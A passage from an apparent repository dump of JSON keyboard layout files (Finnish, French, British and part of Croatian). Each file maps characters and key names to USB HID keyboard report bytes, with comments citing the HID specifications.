\"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"+\":\"00,00,30\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"^\":\"02,00,2e\",\n \"*\":\"02,00,30\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"|\":\"40,00,1e\",\n \"@\":\"40,00,1f\",\n \"#\":\"40,00,20\",\n \"~\":\"40,00,21\",\n \"[\":\"40,00,2f\",\n \"]\":\"40,00,30\",\n \"\\\\\":\"40,00,35\",\n \"`\":\"40,00,35\",\n \"{\":\"42,00,2f\",\n \"}\":\"42,00,30\",\n \"COMMAND-CTRL-SHIFT\":\"42,00,30\",\n \"COMMAND-CTRL\":\"42,00,30\",\n \"COMMAND-OPTION-SHIFT'\":\"42,00,30\"\n}" }, { "path": "languages/fi.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"+\":\"00,00,2d\",\n \"'\":\"00,00,31\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"`\":\"02,00,2e\",\n \"^\":\"02,00,30\",\n \"*\":\"02,00,31\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"$\":\"40,00,21\",\n \"{\":\"40,00,24\",\n \"[\":\"40,00,25\",\n \"]\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"\\\\\":\"40,00,2d\",\n \"~\":\"40,00,30\",\n \"|\":\"40,00,64\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,64\",\n \"COMMAND-CTRL\":\"40,00,64\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,64\"\n}" }, { "path": "languages/fr.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"q\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \",\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"a\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"z\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"w\":\"00,00,1d\",\n \"&\":\"00,00,1e\",\n \"\\\"\":\"00,00,20\",\n \"'\":\"00,00,21\",\n \"(\":\"00,00,22\",\n \"-\":\"00,00,23\",\n \"_\":\"00,00,25\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \")\":\"00,00,2d\",\n \"=\":\"00,00,2e\",\n \"$\":\"00,00,30\",\n \"*\":\"00,00,31\",\n \"m\":\"00,00,33\",\n \";\":\"00,00,36\",\n \":\":\"00,00,37\",\n \"!\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"Q\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"?\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"A\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"Z\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"W\":\"02,00,1d\",\n \"1\":\"02,00,1e\",\n \"2\":\"02,00,1f\",\n \"3\":\"02,00,20\",\n \"4\":\"02,00,21\",\n \"5\":\"02,00,22\",\n \"6\":\"02,00,23\",\n \"7\":\"02,00,24\",\n \"8\":\"02,00,25\",\n \"9\":\"02,00,26\",\n \"0\":\"02,00,27\",\n \"+\":\"02,00,2e\",\n \"M\":\"02,00,33\",\n \"%\":\"02,00,34\",\n \".\":\"02,00,36\",\n \"/\":\"02,00,37\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"~\":\"40,00,1f\",\n \"#\":\"40,00,20\",\n \"{\":\"40,00,21\",\n \"[\":\"40,00,22\",\n \"|\":\"40,00,23\",\n \"`\":\"40,00,24\",\n \"\\\\\":\"40,00,25\",\n \"^\":\"40,00,26\",\n \"@\":\"40,00,27\",\n \"]\":\"40,00,2d\",\n \"}\":\"40,00,2e\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,2e\",\n \"COMMAND-CTRL\":\"40,00,2e\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,2e\"\n}" }, { "path": "languages/gb.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"BACKSPACE\":\"00,00,2a\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"-\":\"00,00,2d\",\n \"=\":\"00,00,2e\",\n \"[\":\"00,00,2f\",\n \"]\":\"00,00,30\",\n \"#\":\"00,00,31\",\n \";\":\"00,00,33\",\n \"'\":\"00,00,34\",\n \"`\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"/\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"NUMLOCK\":\"00,00,53\",\n \"KPAD_SLASH\":\"00,00,54\",\n \"KPAD_ASTERISK\":\"00,00,55\",\n \"KPAD_MINUS\":\"00,00,56\",\n \"KPAD_PLUS\":\"00,00,57\",\n \"KPAD_ENTER\":\"00,00,58\",\n \"KPAD_1\":\"00,00,59\",\n \"KPAD_2\":\"00,00,5a\",\n \"KPAD_3\":\"00,00,5b\",\n \"KPAD_4\":\"00,00,5c\",\n \"KPAD_5\":\"00,00,5d\",\n \"KPAD_6\":\"00,00,5e\",\n \"KPAD_7\":\"00,00,5f\",\n \"KPAD_8\":\"00,00,60\",\n \"KPAD_9\":\"00,00,61\",\n \"KPAD_0\":\"00,00,62\",\n \"KPAD_DOT\":\"00,00,63\",\n \"\\\\\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"£\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"^\":\"02,00,23\",\n \"&\":\"02,00,24\",\n \"*\":\"02,00,25\",\n \"(\":\"02,00,26\",\n \")\":\"02,00,27\",\n \"_\":\"02,00,2d\",\n \"+\":\"02,00,2e\",\n \"{\":\"02,00,2f\",\n \"}\":\"02,00,30\",\n \"~\":\"02,00,31\",\n \":\":\"02,00,33\",\n \"@\":\"02,00,34\",\n \"¬\":\"02,00,35\",\n \"<\":\"02,00,36\",\n \">\":\"02,00,37\",\n \"?\":\"02,00,38\",\n \"|\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"ALT-TAB\":\"04,00,2b\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"COMMAND-CTRL\":\"09,00,00\",\n \"COMMAND-CTRL-SHIFT\":\"0b,00,00\",\n \"COMMAND-OPTION\":\"0c,00,00\",\n \"COMMAND-OPTION-SHIFT'\":\"0e,00,00\",\n \"ALTGR\":\"40,00,00\",\n \"ALTGR-TAB\":\"40,00,2b\",\n \"¦\":\"40,00,35\",\n \"CTRL-ALTGR\":\"41,00,00\",\n \"ALTGR-SHIFT\":\"42,00,00\"\n}" }, { "path": "languages/hr.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"+\":\"00,00,2e\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"*\":\"02,00,2e\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n 